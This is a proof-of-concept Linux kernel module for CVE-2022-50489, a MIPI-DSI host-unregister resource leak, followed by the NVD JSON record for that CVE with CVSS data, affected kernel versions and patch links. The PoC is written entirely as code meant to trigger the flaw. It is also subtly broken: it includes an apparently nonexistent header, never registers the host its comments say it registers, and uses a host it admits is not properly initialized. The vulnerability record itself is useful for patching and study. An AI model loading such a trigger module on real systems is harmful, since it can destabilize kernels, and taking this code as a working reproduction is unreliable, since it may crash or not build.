CVE-2022-50489

/* * CVE-2022-50489 PoC - Trigger MIPI-DSI host unregister without device detach * This PoC demonstrates how to trigger the vulnerability by registering * a MIPI-DSI host, attaching devices, and then unregistering the host * without proper device detachment. */ #include <linux/module.h> #include <linux/kernel.h> #include <linux/init.h> #include <linux/mipi_dsi.h> #include <drm/drm_mipi_dsi.h> static struct mipi_dsi_host *test_host; static struct mipi_dsi_device *test_device; static int test_host_detach(struct mipi_dsi_host *host, struct mipi_dsi_device *device) { pr_info("CVE-2022-50489: host detach callback called\n"); /* In vulnerable kernel, this callback is never invoked */ return 0; } static struct mipi_dsi_host_ops test_host_ops = { .detach = test_host_detach, }; static int __init cve_2022_50489_init(void) { struct mipi_dsi_device_info info = { .type = "test-device", .channel = 0, .node = NULL, }; pr_info("CVE-2022-50489: PoC module loaded\n"); /* Allocate and register a test MIPI-DSI host */ test_host = kzalloc(sizeof(*test_host), GFP_KERNEL); if (!test_host) return -ENOMEM; test_host->ops = &test_host_ops; /* Note: In real scenario, host should be properly initialized */ /* Create a DSI device attached to the host */ test_device = mipi_dsi_device_register_full(test_host, &info); if (IS_ERR(test_device)) { pr_err("Failed to register DSI device\n"); kfree(test_host); return PTR_ERR(test_device); } /* Trigger the vulnerability: unregister host without detaching device */ /* In vulnerable kernel, test_host_detach() will NOT be called */ mipi_dsi_host_unregister(test_host); pr_info("CVE-2022-50489: Host unregistered, check if detach was called\n"); return 0; } static void __exit cve_2022_50489_exit(void) { if (test_host) kfree(test_host); pr_info("CVE-2022-50489: PoC module unloaded\n"); } module_init(cve_2022_50489_init); module_exit(cve_2022_50489_exit); MODULE_LICENSE("GPL"); MODULE_AUTHOR("Security Researcher"); MODULE_DESCRIPTION("PoC for CVE-2022-50489 - MIPI-DSI host unregister resource leak");

{"cve": {"id": "CVE-2022-50489", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:45.827", "lastModified": "2026-03-25T00:30:22.677", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/mipi-dsi: Detach devices when removing the host\n\nWhenever the MIPI-DSI host is unregistered, the code of\nmipi_dsi_host_unregister() loops over every device currently found on that\nbus and will unregister it.\n\nHowever, it doesn't detach it from the bus first, which leads to all kind\nof resource leaks if the host wants to perform some clean up whenever a\ndevice is detached."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.14", "versionEndExcluding": "4.9.331", "matchCriteriaId": "C3749FA3-6386-47BC-BD05-84231EA40A1C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.10", "versionEndExcluding": "4.14.296", "matchCriteriaId": "1927ABC6-E0D2-478F-B103-B982A42D1158"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "4.19.262", "matchCriteriaId": "D6B62970-1FAD-4ED6-930A-23E26A8D2E08"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.220", "matchCriteriaId": "125F7133-B3B7-4175-8CF3-FF0845483254"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.150", "matchCriteriaId": "C495821C-2A71-4F09-BED8-6A6EB4C9BA27"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.75", "matchCriteriaId": "6D945F46-F32F-4C09-8400-C3477E22A9FB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "5.19.17", "matchCriteriaId": "19B4C3A4-E5C3-41DC-BB14-BE72858E7D35"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0", "versionEndExcluding": "6.0.3", "matchCriteriaId": "5BCD8201-B847-4442-B894-70D430128DEF"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/262364574b05676d4b9ebde2ddd3588cd2efd8ce", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/26c1b4cfe56f040f71a51c92da1f4cac2e3b9455", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/353ab1c13fdd6e524edde780235a8ce9b892c81c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/45120fa5e522d444e3fc1c5a9afc5d53eed91d00", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/668a8f17b5290d04ef7343636a5588a0692731a1", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6fc2cd40db1969ba372ce9536dcfcdb87271eac4", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8242167cfc83dd7e4c96f44b45f108db9bb88146", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/95ae458209f5a556bba98aff872f933694914eb7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/c202cda08cd5693645d4990ad1eb2e8068a884ec", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}